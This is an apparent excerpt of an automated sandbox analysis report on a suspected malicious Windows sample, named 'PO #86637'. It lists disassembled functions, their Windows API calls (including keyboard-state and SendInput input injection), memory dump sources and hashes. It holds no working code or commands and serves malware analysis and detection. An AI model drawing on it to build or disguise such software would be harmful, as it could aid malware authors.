                      • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                      Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                      Download Yara Rule
                      APIs
                      • ___set_flsgetvalue.LIBCMT ref: 00413D20
                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                      • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                      • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                      • ExitThread.KERNEL32 ref: 00413D4E
                      • GetCurrentThreadId.KERNEL32 ref: 00413D54
                      • __freefls@4.LIBCMT ref: 00413D74
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                      • String ID:
                      • API String ID: 259663610-0
                      • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                      • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                      • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                      • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                      Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                      Download Yara Rule
                      APIs
                      • GetClientRect.USER32(?,?), ref: 004302E6
                      • GetWindowRect.USER32(00000000,?), ref: 00430316
                      • GetClientRect.USER32(?,?), ref: 00430364
                      • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                      • GetWindowRect.USER32(?,?), ref: 004303C3
                      • ScreenToClient.USER32(?,?), ref: 004303EC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Rect$Client$Window$MetricsScreenSystem
                      • String ID:
                      • API String ID: 3220332590-0
                      • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                      • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                      • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                      • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                      Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _malloc_wcslen$_strcat_wcscpy
                      • String ID:
                      • API String ID: 1612042205-0
                      • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                      • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                      • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                      • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                      Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memmove_strncmp
                      • String ID: >$U$\
                      • API String ID: 2666721431-237099441
                      • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                      • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                      • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                      • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                      Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                      Download Yara Rule
                      APIs
                      • GetKeyboardState.USER32(?), ref: 0044C570
                      • SetKeyboardState.USER32(00000080), ref: 0044C594
                      • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                      • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                      • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                      • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessagePost$KeyboardState$InputSend
                      • String ID:
                      • API String ID: 2221674350-0
                      • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                      • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                      • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                      • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                      Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _wcscpy$_wcscat
                      • String ID:
                      • API String ID: 2037614760-0
                      • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                      • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                      • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                      • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                      Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                      • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                      • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                      • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                      • VariantClear.OLEAUT32(?), ref: 00451CA1
                      • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Variant$Copy$AllocClearErrorLastString
                      • String ID:
                      • API String ID: 960795272-0
                      • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                      • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                      • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                      • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                      Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                      Download Yara Rule
                      APIs
                      • BeginPaint.USER32(00000000,?), ref: 00447BDF
                      • GetWindowRect.USER32(?,?), ref: 00447C5D
                      • ScreenToClient.USER32(?,?), ref: 00447C7B
                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                      • EndPaint.USER32(?,?), ref: 00447D13
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                      • String ID:
                      • API String ID: 4189319755-0
                      • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                      • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                      • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                      • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                      Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                      • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                      • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                      • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                      • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$LongWindow$InvalidateRect
                      • String ID:
                      • API String ID: 1976402638-0
                      • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                      • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                      • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                      • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                      Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                      Download Yara Rule
                      APIs
                      • ShowWindow.USER32(?,00000000), ref: 00440A8A
                      • EnableWindow.USER32(?,00000000), ref: 00440AAF
                      • ShowWindow.USER32(?,00000000), ref: 00440B18
                      • ShowWindow.USER32(?,00000004), ref: 00440B2B
                      • EnableWindow.USER32(?,00000001), ref: 00440B50
                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window$Show$Enable$MessageSend
                      • String ID:
                      • API String ID: 642888154-0
                      • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                      • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                      • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                      • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                      Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Variant$Copy$ClearErrorLast
                      • String ID: NULL Pointer assignment$Not an Object type
                      • API String ID: 2487901850-572801152
                      • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                      • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                      • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                      • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                      Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window$Enable$Show$MessageSend
                      • String ID:
                      • API String ID: 1871949834-0
                      • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                      • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                      • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                      • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                      Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                      • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                      • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                      • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                      Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                      Download Yara Rule
                      APIs
                      • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                      • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                      • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                      • SendMessageW.USER32 ref: 00471AE3
                      • DestroyIcon.USER32(?), ref: 00471AF4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                      • String ID:
                      • API String ID: 3611059338-0
                      • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                      • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                      • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                      • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                      Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: DestroyWindow$DeleteObject$IconMove
                      • String ID:
                      • API String ID: 1640429340-0
                      • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                      • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                      • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                      • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                      Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                      • _wcslen.LIBCMT ref: 004438CD
                      • _wcslen.LIBCMT ref: 004438E6
